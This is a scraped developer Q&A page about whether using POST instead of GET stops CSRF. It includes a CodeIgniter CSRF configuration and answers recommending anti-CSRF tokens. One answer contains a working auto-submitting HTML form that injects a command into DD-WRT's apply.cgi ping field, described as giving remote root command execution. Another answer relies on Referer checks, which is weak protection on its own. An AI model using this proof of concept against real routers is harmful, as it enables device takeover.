开发者

PHP security using POST instead of GET to protect against XSRF?

问答 作者:

I have some URLs like http://mysite.com/module/45/set_name/new-name in my application which are designed to be accessed using ajax.

In order to prevent XSRF I force such request to be POST requests. With GET it's trivial to generate a XSRF using the following:

<img src="http://mysite.com/module/45/set_name/new-name"/>

Using POST prevents this particular attack but is this actually any more secure than using GET? If not, what else can/should be done?

Thanks.

Edit: I'm using CodeIgniter and have the following in my config:

开发者_JAVA技巧$config['csrf_protection'] = TRUE;
$config['csrf_token_name'] = 'csrf_test_name';
$config['csrf_cookie_name'] = 'csrf_cookie_name';
$config['csrf_expire'] = 3600;

Am I safe? Are there any downsides to having the CSRF on? Other than forms expiring after an hour?

Using POST alone is not enough because someone can make a form with hidden input elements and automatically submit it to your website. It's not as easy as an img element with GET request but it's still possible. What you should use is some form of verification in the POST parameters, like a random value or session token that unlike cookies would not be sent in a XSRF request.

No chaning to post does not solve this problem. You should read Cross-Site Request Forgery (CSRF) Prevention Cheat Sheet.

Here is an example Proof of Cocnept POST based CSRF exploit that I wrote. This gives you remote root access to DD-WRT:

<html>
    <form method="post" action="http://192.168.1.1/apply.cgi" id=1>
        <input name="submit_button" value="Ping" type="hidden">
        <input name="action" value="ApplyTake" type="hidden">
        <input name="submit_type" value="start" type="hidden">
        <input name="change_action" value="gozila_cgi" type="hidden">
        <input name="next_page" value="Diagnostics.asp" type="hidden">
        <input name="ping_ip" value="echo owned">
        <input name="execute command" type="submit">
    </form>
</html>
<script>
    document.getElementById(1).submit();//remote root command execution!
</script>

Why don't you just check the referrer sent along with the request? Both image src and javascript-sent form will inform you that the request is sent from a different host and you can just block that request.

You're taking this problem wrong.
Your real problem is completely different - you're using improper methods.

When GET method used properly, to retrieve data from server no CSRF attack could be possible ever.

So, if your request alters data on the server side, you have to change it to POST anyway, despite of all these romantic and scaring things like CSRF, XSS and such.
It's just a technology basics.

As of CSRF itself, it's not a big deal at all. Just make sure that all your forms contain some anti-csrf token (also stored in the session) and all POST form handlers do verify it.

继续阅读:csrfphpsecurity

更多精彩内容

0

上一篇:

下一篇:

精彩评论

暂无评论...
登录 注册
Qedev.com
验证码 换一张
取 消

最新问答

问答排行榜

法律声明:本站内容均为网友上传,网站举办方负责审核和监督,

如存在版权或非法内容,欢迎举报,我们将尽快予以删除。

Copyright © 2018-2020 开发者. All rights reserved.

Powered by 开发者

ICP备案号: 京ICP备10032868号-9